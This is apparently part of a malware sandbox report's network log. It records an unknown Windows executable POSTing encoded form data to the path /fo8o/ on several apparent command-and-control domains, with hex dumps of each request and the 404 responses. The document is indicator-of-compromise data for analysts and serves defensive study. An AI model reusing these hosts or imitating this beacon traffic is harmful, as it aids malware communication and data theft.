                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.849741195.110.124.133803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:38.087965012 CEST824OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.elettrosistemista.zip
                                                          Origin: http://www.elettrosistemista.zip
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 56 6d 36 55 79 52 6f 61 61 36 70 4c 36 46 4a 51 39 75 2f 76 75 6f 36 66 32 62 6f 4c 45 79 6f 71 74 6e 42 52 77
                                                          Data Ascii: Plm0mn68=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxvVm6UyRoaa6pL6FJQ9u/vuo6f2boLEyoqtnBRw
                                                          May 23, 2024 20:22:38.782927990 CEST367INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:38 GMT
                                                          Server: Apache
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.849742195.110.124.133803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:40.735702038 CEST1841OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.elettrosistemista.zip
                                                          Origin: http://www.elettrosistemista.zip
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 43 66 2f 2f 71 30 52 61 49 71 70 39 59 76 73 4b 61 30 53 35 6f 2f 44 76 4a 37 39 53 36 53 68 7a 75 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 69 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a [TRUNCATED]
                                                          Data Ascii: Plm0mn68=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKCf//q0RaIqp9YvsKa0S5o/DvJ79S6ShzuH+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuiCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adEqPPSb596q02+bm10h/KbfXTSTOac3EfjuVQou72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQYK911v/jw+PvZPYENr7STg8l0F3Ck6zV/xq1Dwgu7JJlRF+hAwxxua7LvS1AAdhBU1HBZstoRWAHyLbMWL7UzFXXPMllHfqBBFn5xU9fUOjVkD57bXun2hTR7+B3omt0GagFXgV9C43jnm0Z75arUxuHyRsw6jHloDTJUUv0x+RGZxA480KZmNeLnxJB7gRXwcZ3ObkUZdNYgtX5mu2bWtzVzhWkv2jaEmpvKYj0gX7vQpGNVz/jEIunuuC6hWo22PkhTxBptpyk2r6lwkrb0tv/hbsCsaLWX8fcmD0/i2PSXddJXQXobz8OjWYV1zT2iFUUVP+K2/IwOhEvlyoIgIyNGb0whqhjDeOTaEXJBhlHkm0Yj/QkU2pCt2+M6VQZbaqGTZVZtW2Vxfea1e7rOEmm6W9YBDB4eNzgJyODVo31o39GOR9pYERPj2lU9+KQZYN/z3B9UKWVkNYMP65mslzl+IzchTJVhnfM5gRIQiAIx8v3ZDE1gAlKesA0ev8l+bFsiA1fwCJU [TRUNCATED]
                                                          May 23, 2024 20:22:41.425685883 CEST367INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:41 GMT
                                                          Server: Apache
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.849743195.110.124.133803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:43.308619976 CEST527OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.elettrosistemista.zip
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:22:43.999885082 CEST367INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:43 GMT
                                                          Server: Apache
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.84974423.227.38.74803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:49.409663916 CEST798OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.donnavariedades.com
                                                          Origin: http://www.donnavariedades.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.donnavariedades.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 5a 30 44 2b 30 37 2b 32 4d 31 35 63 76 4b 4a 57 46 30 73 66 6f 34 69 41 5a 67 38 63 51 5a 71 76 6a 43 56 79 79 6b 3d
                                                          Data Ascii: Plm0mn68=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpZ0D+07+2M15cvKJWF0sfo4iAZg8cQZqvjCVyyk=
                                                          May 23, 2024 20:22:49.959871054 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:49 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Sorting-Hat-PodId: 311
                                                          X-Sorting-Hat-ShopId: 87850025272
                                                          Vary: Accept-Encoding
                                                          x-frame-options: DENY
                                                          x-shopid: 87850025272
                                                          x-shardid: 311
                                                          x-request-id: a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569
                                                          server-timing: processing;dur=13
                                                          content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569
                                                          x-content-type-options: nosniff
                                                          x-download-options: noopen
                                                          x-permitted-cross-domain-policies: none
                                                          x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569
                                                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                          Content-Encoding: gzip
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7efsWEkAW5KN724jM4PIt5%2BPnHVXim8zh3om1wxAFVl
                                                          Data Raw:
                                                          Data Ascii:
                                                          May 23, 2024 20:22:49.960213900 CEST1236INData Raw: 63 49 61 25 32 42 63 31 50 7a 44 55 78 4f 4b 48 53 57 45 4c 69 36 46 61 70 6f 76 4a 39 78 6d 4c 44 65 44 42 64 46 67 66 6e 6b 4b 6b 74 43 79 75 51 31 5a 77 4a 50 42 37 6b 79 64 47 7a 33 77 77 43 52 4b 41 51 56 6b 44 76 66 70 66 66 6f 52 35 6a 25
                                                          Data Ascii: cIa%2Bc1PzDUxOKHSWELi6FapovJ9xmLDeDBdFgfnkKktCyuQ1ZwJPB7kydGz3wwCRKAQVkDvfpffoR5j%2BDqr5D4o9ePk4z%2Bj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration
                                                          May 23, 2024 20:22:49.964612007 CEST834INData Raw: 8a 7a 10 3e f3 58 17 15 3b a2 81 7a 08 92 9e 1a 60 6e 98 dc 0c 60 0d 37 17 ef 86 1a 19 49 ae 10 29 fc 26 34 40 c5 ac 7a 15 72 f8 e7 a9 b0 ab cf 24 54 cb 19 31 90 ab db 23 a3 a7 2f f9 c3 da 09 e1 f1 4a 42 84 53 07 c1 68 d2 43 83 5f 3b 91 1f 39 e8
                                                          Data Ascii: z>X;z`n`7I)&4@zr$T1#/JBShC_;9a-etObaJ!~/F*g^=#-`C>0TA!5pZ;?^~S[jwjC0A[J3sz[!7kX:I=uj%


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.84974523.227.38.74803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:51.949446917 CEST818OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.donnavariedades.com
                                                          Origin: http://www.donnavariedades.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.donnavariedades.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 51 4a 41 61 49 4b 5a 6e 45 43 31 41 53 6c 73 6c 78 6f 71 53 75 4e 6f 45 6b 7a 54 50 4d 4b 38 57 70 74 39 58 55 4f
                                                          Data Ascii: Plm0mn68=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoQJAaIKZnEC1ASlslxoqSuNoEkzTPMK8Wpt9XUO
                                                          May 23, 2024 20:22:52.523452044 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:52 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Sorting-Hat-PodId: 311
                                                          X-Sorting-Hat-ShopId: 87850025272
                                                          Vary: Accept-Encoding
                                                          x-frame-options: DENY
                                                          x-shopid: 87850025272
                                                          x-shardid: 311
                                                          x-request-id: 0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572
                                                          server-timing: processing;dur=10
                                                          content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572
                                                          x-content-type-options: nosniff
                                                          x-download-options: noopen
                                                          x-permitted-cross-domain-policies: none
                                                          x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572
                                                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                          Content-Encoding: gzip
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrzTHDOdGwhQJAbFqQqq3IqRQX0H7ZbPYp32%2Fc%2FNM5
                                                          Data Raw:
                                                          Data Ascii:
                                                          May 23, 2024 20:22:52.524388075 CEST224INData Raw: 51 47 4c 70 46 4d 68 46 6e 62 4b 4d 45 39 4e 39 69 65 30 35 49 66 50 6d 33 31 58 49 46 73 4b 43 39 62 53 34 71 50 4a 74 56 47 59 37 79 30 47 31 63 67 6c 42 74 78 37 30 71 65 55 25 32 46 74 30 44 7a 30 34 6c 71 46 57 61 6d 6b 55 59 59 75 68 5a 74
                                                          Data Ascii: QGLpFMhFnbKME9N9ie05IfPm31XIFsKC9bS4qPJtVGY7y0G1cglBtx70qeU%2Ft0Dz04lqFWamkUYYuhZtDkmaR8TmG%2Bx54OZoB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing
                                                          May 23, 2024 20:22:52.527308941 CEST1236INData Raw: 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 36 32 2e 39 39 39 39 36 34 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 38 37 31 32 65 39 38 61 32 39 34 33 63 31 2d 45 57
                                                          Data Ascii: : cfRequestDuration;dur=62.999964Server: cloudflareCF-RAY: 888712e98a2943c1-EWRalt-svc: h3=":443"; ma=864006b6X4~@y;M\w<!77qi34mh?xw?Q-B=PC(n^ T$\;
                                                          May 23, 2024 20:22:52.527329922 CEST606INData Raw: 89 a8 be 86 86 a5 73 90 14 d0 d9 6c b9 d8 43 5b a7 86 70 5d d2 57 5e 8c 43 1f 90 83 8f 8b bc 45 b4 1a 26 9f 5d 50 39 2a 3d d5 44 42 2b 07 7d d5 49 f0 76 f7 e6 99 e6 3b f2 48 c5 c7 d4 c6 38 1a b5 26 49 f2 51 a5 67 b5 44 b4 10 8c 2b 9e 9c dd c8 b2
                                                          Data Ascii: slC[p]W^CE&]P9*=DB+}Iv;H8&IQgD+QS0?A,:"k.bt-8\/lig1@y3?KS]K\p8M2ft;8Qkhe8F7G'T|~{RlvqA]6sLwM($p=[
                                                          May 23, 2024 20:22:52.527339935 CEST5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.84974623.227.38.74803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:54.495450974 CEST1835OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.donnavariedades.com
                                                          Origin: http://www.donnavariedades.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.donnavariedades.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 48 77 58 4b 4c 49 32 4e 70 45 2b 66 57 30 55 38 6a 75 65 70 6e 52 71 39 55 4f 6d 39 48 55 54 47 2f 6c 75 6f 52 35 5a 72 32 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 59 76 4d 53 6e 48 54 30 45 64 4b 48 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 [TRUNCATED]
